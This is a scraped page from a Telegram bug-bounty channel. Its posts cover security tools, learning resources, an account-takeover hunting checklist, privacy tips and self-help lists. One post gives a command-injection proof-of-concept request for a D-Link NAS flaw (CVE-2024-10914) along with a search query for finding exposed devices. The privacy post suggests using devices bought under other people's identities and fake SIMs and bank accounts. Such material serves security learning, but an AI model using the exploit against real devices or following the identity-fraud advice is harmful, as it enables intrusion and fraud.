Available now! Telegram Research 2025 โ the year's key insights 
Bug bounty Tips
Open in Telegram
๐ก๏ธ Cybersecurity enthusiast | ๐ป Helping secure the digital world | ๐ Web App Tester | ๐ต๏ธโโ๏ธ OSINT Specialist Admin: @laazy_hack3r
Show more5 801
Subscribers
+1424 hours
+777 days
+41130 days
Posts Archive
5 801
How To Protect Yourself from Ransomware (Full Guide)
Ransomware is a type of malicious software (malware) that hackers use to lock or encrypt your files or computer They demand money ( "ransom") to unlock it or give you access back. Usually, it spreads through fake emails, links,downloads or vulnerability.
Posted by @BugSpy don't share without credit.
Make me admin in your channel to get more followers !! And awesome content for free๐ฆ
5 801
35 Top Cybersecurity Tools
1. Nmap
2. Metasploit
3. Wireshark
4. Kali Linux
5. John the Ripper
6. Nikto
7. Burp Suite
8. Tor
9. Tcpdump
10. Aircrack-ng
11. Splunk
12. Acunetix
13. Snort
14. Mimecast
15. Malwarebytes
16. OpenVAS
17. SecPod SanerNow
18. UnderDefense
19. Intruder
20. ManageEngine Vulnerability Manager Plus
21. ManageEngine Log360
22. SolarWinds Security Event Manager
23. Norton Security
24. McAfee
25. AVG
26. System Mechanic Ultimate Defense
27. Vipre
28. LifeLock
29. Bitdefender Total Security
30. NordLayer
31. Perimeter 81
32. CIS
33. Webroot
34. GnuPG
35. Sparta Antivirus
5 801
Awesome Bug Bounty Tools.
โข Recon:
- Subdomain Enumeration;
- Port Scanning;
- Screenshots;
- Technologies;
- Content Discovery;
- Links;
- Parameters;
- Fuzzing.
โข Exploitation:
- Command Injection;
- CORS Misconfiguration;
- CRLF Injection;
- CSRF Injection;
- Directory Traversal;
- File Inclusion;
- GraphQL Injection;
- Header Injection;
- Insecure Deserialization;
- Insecure Direct Object References;
- Open Redirect;
- Race Condition;
- Request Smuggling;
- Server Side Request Forgery;
- SQL Injection;
- XSS Injection;
- XXE Injection.
โข Miscellaneous:
- Passwords;
- Secrets;
- Git;
- Buckets;
- CMS;
- JSON Web Token;
- postMessage;
- Subdomain Takeover;
- Uncategorized.
5 801
![๐The 4M #Methodology for Choosing the Right Bug Bounty Programs to #Hunt On: [Cross-Applying Finance to Bug Bounties] ๐ฑ Not](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAATACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwCsY49m7cvJ9RQ5hJVRtzjmqyvgAYFKZP8AZFIC0kcKL8xjJ9jmooXjaYl0VVI71F5pz90UhkJ9B9KYFlxHtZh5fHOAaKqFietFIBQOKQ0UUwEooooAKKKKAP/Z)
๐The 4M #Methodology for Choosing the Right Bug Bounty Programs to #Hunt On: [Cross-Applying Finance to Bug Bounties]
๐ฑ Notion: ๐Link
5 801
Ever wondered how to craft those awesome payloads? Hmm, this is the book you need.
It will tell you how to find those awesome XSS and then how to be a master in it.
5 801
"How to learn the real stories behind the exploits of hackers, intruders and fraudsters"
5 801
โตThe Art of Disappearing Online: as Someone Is Watching youโต
Get Real VPN (Not That Free Shit)
First things first Get VPNโand not the free garbage If youโre using a free VPN youโre basically paying in privacy use
no-log VPNs like Mullvad NordVPN and express or any vpn that really gives priority to your privacy and dont leak shit and
Use Residential Rotating Proxies as Datacenter proxies are trash
Pro Tip Pay with cryptocurrency for even more anonymity
Burn Your Digital Footprintโฏ
Delete everything Iโm talking about your cringe 2016 Facebook even that LinkedIn profile you forgot about and not using
Facebook: Deactivate it? No. Delete it. Fully.
Instagram: Burn it unless youโre using it from fake identity to watch hot reels.
Twitter: If Elon knows your thoughts, so do the feds
Bonus: use sites like AccountKiller to make nuking faster.
Use Disposable Everything (Burner emails, burner numbers, burner devices.)โฏ
For emails: use Tutanota, or any temp email service not gmail as Google is watching you harder than your ex๐
For numbers: use Hushed, Burner or some other cheap service If a site asks for your phone number Give them fake
Encrypted Messagingโฏ
Forget SMS WhatsApp, and yes, even Telegram๐ฅฒ
Hereโs the truth Telegram is no longer as safe as you think๐ฅน.
It process you data now and if youโre not using secret chats
anyone with access to Telegramโs servers can see your messages.
Better Alternativesโฏ
Signal: End-to-end encryption, trusted by privacy nerds everywhere.
Session: No phone number required more anonymous.
Threema: ultra-private.
warning Never trust any messaging app with your life.
Encrypted doesnโt mean invincible.
start using Virtual Machines and Tails OSโฏ
If youโre serious about privacy:
Use a Virtual Machine (VM) for anything sensitive. Run your shady tasks in the VM and
nuke it afterward.
stat using Use Tails Os as It is extreme privacy-focused os you can get tails os or qubes os complete tutorial on my channel in my bio
Encrypt Everything
Use full-disk encryption on your laptop with
veraCrypt or BitLocker
Android users can use GrapheneOS or CalyxOS
iPhone users use latest ios
Browser Hygiene Matters alotโฏ๐
๐๐
as you know Your browser is leaking more info than a middle school gossip. Fix it:
Donโt Use Google as google is not your friends and it still no more about you then your family
and thatโs not a compliment.
Block Trackers: Install uBlock Origin and Privacy Badger.
Use Private Search Engines
better use anti detect browser
Donโt Trust Anyone Online - Not even your e-girl or your e-bro coz
when things go south, theyโll throw you under the bus faster than you can think
Use Fake Names and Passwords Like Itโs a Religionโฏ
For every account, use a different name,
burner email, and a random password.
Why? Because one breach and your whole identity goes on sale
to the highest bidder and cracker
you can also use password managers like lastPass, Bitwarden, whatever
Burner device and phoneโฏ
if you work is too extreme then you can buy device purchased on other people identiy
and use fรฅke sim fake bรฃnk
Go Dark When Necessaryโฏ
When things get worst, vanish completely. Disable accounts, log off everything, and go radio silent. Silence is power.
Keep Learningโฏ
OPSEC is an evolving game. Stay sharp.
you can follow my channel from my bio for more tutorial and learnings
and remember trust no one, question everything, and always stay one step ahead.
What NOT to Doโฏ
Donโt Post Pictures With EXIF Data
Donโt Use Easy Passwords
Donโt Overshare online
Donโt Click Random Links
Donโt Get too Comfortable( moment you think youโre untouchable is the moment of downfall.)
Donโt Trust Free Stuff control you emotions as i was once hacked in 2021 using session hijacking
The best way to disappear is to never exist in the first place but if you do exist be a ghost
as the less they know, the better you sleep --The AlphaSec
Written by @BugSpy (don't share without credit it took me 30 minutes of pain to make)
Make me admin in your channel to get more followers !! And awesome content for free๐ฆ
5 801
๐Top Hacking Books + Resources
I have compiled all the resources from this ๐ฑ YouTube video for you (free!), and I believe they will be sufficient for anyone looking to start their journey in #cybersecurity. Special thanks to David Bombal and Jason Haddix for sharing their knowledge to help us learn in 2024!โฌ๏ธBooks:
๐Web application hacker's handbook ๐OWASP Web Security Testing Guide ๐Real World Bug Hunting ๐Bug Bounty Bootcamp ๐Red Team Field Manual v1 & v2 ๐Red Team Development ... ๐Operator Handbook: Red Team... ๐Tribe of Hackers Red Team ๐The Pentester Blueprint ๐OSINT Techniques: Resources ... ๐Evading EDR ๐Attacking Network Protocols ๐Black Hat GraphQL ๐Hacking APIโs ๐Black Hat Go ๐Black Hat Python ๐Black Hat Bash ๐Zseanoโs methodology ๐Breaking into information security ๐Expanding your security horizons๏ปฟ โฌ๏ธGithub Resources:
๐ฑ Wiki Book Pentest living document ๐ฑ Fuzzing lists ๐ฑ Sec Lists ๐ฑ Payloads all the things โฌ๏ธBlogs & Lab
s: ๐ฅ HackTRICKS ๐ฅ Web Security Testing Guide v4.2 ๐ฅ APISEC University ๐ฅ Web security academy, Port Swigger ๐ฅ Pentester Lab ๐ฅ Try Hack Me: Red Team... ๐ฅ HTB Academy ๐ฅ Hacktivity ๐ฅ Vulnerable U ๐ฅ Bug Bounty Reports Explained ๐ฅ Sharing what matters in security ๐ฅ Intigriti ๐ฅ tl;dr sec ๐ฅ Unsupervised learning ๐ฅ Pentest Book ๐ฅ Bugcrowd ๐ฅ Trickest ๐งโ๐This took me a lot of time, so I would appreciate your support through comments, shares, ๐คฉstars, reactions, or anything else you can offer. Thank you all!๐โฅ๏ธ #infosec #bugbounty #pentest #redteam #books #bugbountyTips #Hacking
5 801
๐How to Install and Set Up Qubes OS for Maximum Security๐ถ
Qubes OS is a super-secure operating system that works by separating your activities into different virtual machines called "qubes." For example, you can keep your work, personal, and risky tasks like browsing in separate qubes, so even if one gets hacked, the others stay safe. Itโs great for preventing malware or spying because each qube is isolated. You can even use disposable qubes for things like opening suspicious files, and they disappear after use. Itโs powerful but needs good hardware
Posted by @BugSpy don't share without credit.
Make me admin in your channel to get more followers !! And awesome content for free๐ฆ
5 801
๐ฅ Joe podcast with naval ravikant must watch this Gem Podcast
โค๏ธShare with your Mates.
5 801
cve-2024-10914
GET
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27
FOFA๏ผapp =D_Link-DNS-ShareCenter
#exploit #poc #IoT
5 801
โ ๏ธ S3 Bucket Recon โ ๏ธ
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
5 801
MY ADVICE TO YOUTHS
1. Your control of your sexual urges will be the reason you are either successful or a failure.
2. Porn and masturbation is the greatest killer of success. It stunt and destroy your brain.
3. Avoid drinking alcohol like a camel drinking water. Nothing worse than losing your senses and acting a fool.
4. Keep your standards high and don't settle for something because it's available.
5. If you find someone smarter than you, work with them, don't compete.
6. No one is coming to save your problems. Your life's 100% is your responsibility.
7. You shouldn't take advice from people who are not where you want to be in life.
8. Find new ways to make money. Make money and ignore the jokers who mocks and make fun of you.
9. You don't need 100 self-help books, all you need is action and self discipline. Be disciplined!
10. Avoid drugs. Avoid weed.
11. Learn skills on YouTube not wasting your time consuming shitty content on Netflix.
12. No one cares about you. So stop being shy, go out and create your chances.
13. Comfort is the worst addiction and cheap ticket to depression.
14. Prioritize your family. Defend them even if they stink, even if they are idiots. Cover their nakedness.
15. Find new opportunities and learn from people ahead of you.
16. Trust no one. Not a single person no matter how tempted. Believe in yourself.
17. Don't wait for miracles make them happen. Yes you can't always do it alone but don't listen to the opinion of people.
18. Hardwork and determination can make you achieve anything.
Humbling yourself only takes you higher.
19. Stop waiting to discover yourself. Create YOU instead.
20. The world won't slow down for you.
21. No one owes you anything.
22. Life is a single-player game. Youโre born alone. Youโre going to die alone. All of your interpretations are alone. Youโre gone in three generations and nobody cares. Before you showed up, nobody cared. Itโs all single-player.
5 801
๐afrog๐ธ - A Security Tool for Bug Bounty, Pentest and Red Teaming.
afrog is a high-performance vulnerability scanner that is fast and stable. It supports user-defined PoC and comes with several built-in types, such as CVE, CNVD, default passwords, information disclosure, fingerprint identification, unauthorized access, arbitrary file reading, and command execution. With afrog, network security professionals can quickly validate and remediate vulnerabilities, which helps to enhance their security defense capabilities.Installation
go install -v github.com/zan8in/afrog/v3/cmd/afrog@latest5 801
18. Bypassing Digits Origin Validation Which Leads to Account Takeover- How to Hunt: - Look for vulnerabilities where digits origin validation can be bypassed. - Refer to [HackerOne Report 129873](https://hackerone.com/reports/129873) for more details. 19. Top ATO Reports in HackerOne - How to Hunt: - Review top account takeover reports in HackerOne. - Refer to [TOP ACCOUNT TAKEOVER](https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPACCOUNTTAKEOVER.md) for more details.
5 801
โ๏ธ๐๐ฐ๐ฐ๐ผ๐๐ป๐ ๐ง๐ฎ๐ธ๐ฒ๐ผ๐๐ฒ๐ฟ ๐๐๐ด ๐๐ผ๐๐ป๐๐ ๐ง๐ถ๐ฝ๐ ๐ณ๐ผ๐ฟ ๐ก๐ฒ๐ ๐๐๐ด ๐๐๐ป๐๐ฒ๐ฟ๐โ๏ธ
โ ๏ธSimplified Tips for Account Takeover (ATO)
1. Pre-Account Takeover - How to Hunt: - Register an email without verifying it. - Register again using a different method (e.g., 'sign up with Google') with the same email. - Check if the application links both accounts. - Try logging in to see if you can access information from the other account. 2. Account Takeover due to Improper Rate Limiting - How to Hunt: - Capture the login request. - Use tools like Burp Suite's Intruder to brute-force the login. - Analyze the response and length to detect anomalies. 3. Account Takeover by Utilizing Sensitive Data Exposure - How to Hunt: - Pay attention to the request and response parts of the application. - Look for exposed sensitive data like OTPs, hashes, or passwords. 4. Login Vulnerabilities - Check for: - Brute-force vulnerabilities. - OAuth misconfigurations. - OTP brute-forcing. - JWT misconfigurations. - SQL injection to bypass authentication. - Proper validation of OTP or tokens. 5. Password Reset Vulnerabilities - Check for: - Brute-force vulnerabilities in password reset OTPs. - Predictable tokens. - JWT misconfigurations. - IDOR vulnerabilities. - Host header injection. - Leaked tokens or OTPs in HTTP responses. - Proper validation of OTP or tokens. - HTTP parameter pollution (HPP). 6. XSS to Account Takeover - How to Hunt: - Try to exfiltrate cookies or auth tokens. - Craft XSS payloads to change user email or password. 7. CSRF to Account Takeover - Check for: - Vulnerabilities in email update endpoints. - Vulnerabilities in password change endpoints. 8. IDOR to Account Takeover - Check for: - Vulnerabilities in email update endpoints. - Vulnerabilities in password change endpoints. - Vulnerabilities in password reset endpoints. 9. Account Takeover by Response & Status Code Manipulation- How to Hunt: - Look for vulnerabilities where manipulating response or status codes can lead to account takeover. 10. Account Takeover by Exploiting Weak Cryptography- Check for: - Weak cryptographic implementations in password reset processes. 11. Password or Email Change Function- How to Hunt: - If you see email parameters in password change requests, try changing your email to the victim's email. 12. Sign-Up Function- How to Hunt: - Try signing up with the target email directly. - Use third-party sign-ups with phone numbers, then link the victim's email to your account. 13. Rest Token - How to Hunt: - Try using your REST token with the target account. - Brute 13. Rest Token- How to Hunt: - Try using your REST token with the target account. - Brute force the REST token if it is numeric. - Try to figure out how the tokens are generated. For example, check if they are generated based on timestamp, user ID, or email. 14. Host Header Injection- How to Hunt: - Intercept the REST account request. - Change the Host header value from the target site to your own domain (e.g., `POST /PassRest HTTP/1.1 Host: Attacker.com`). 15. CORS Misconfiguration to Account Takeover - How to Hunt: - Check if the application has CORS misconfigurations. - If so, you might be able to steal sensitive information from the user to take over their account or make them change authentication information. - Refer to [CORS Bypass](https://book.hacktricks.xyz/pentesting-web/cors-bypass) for more details. 16. Account Takeover via Leaked Session Cookie - How to Hunt: - Look for vulnerabilities where session cookies are leaked. - Refer to [HackerOne Report 745324](https://hackerone.com/reports/745324) for more details. 17. HTTP Request Smuggling to ATO- How to Hunt: - Look for HTTP request smuggling vulnerabilities. - Refer to [HackerOne Reports 737140 and 740037](https://hackerone.com/reports/737140) and [HackerOne Report 740037](https://hackerone.com/reports/740037) for more details.
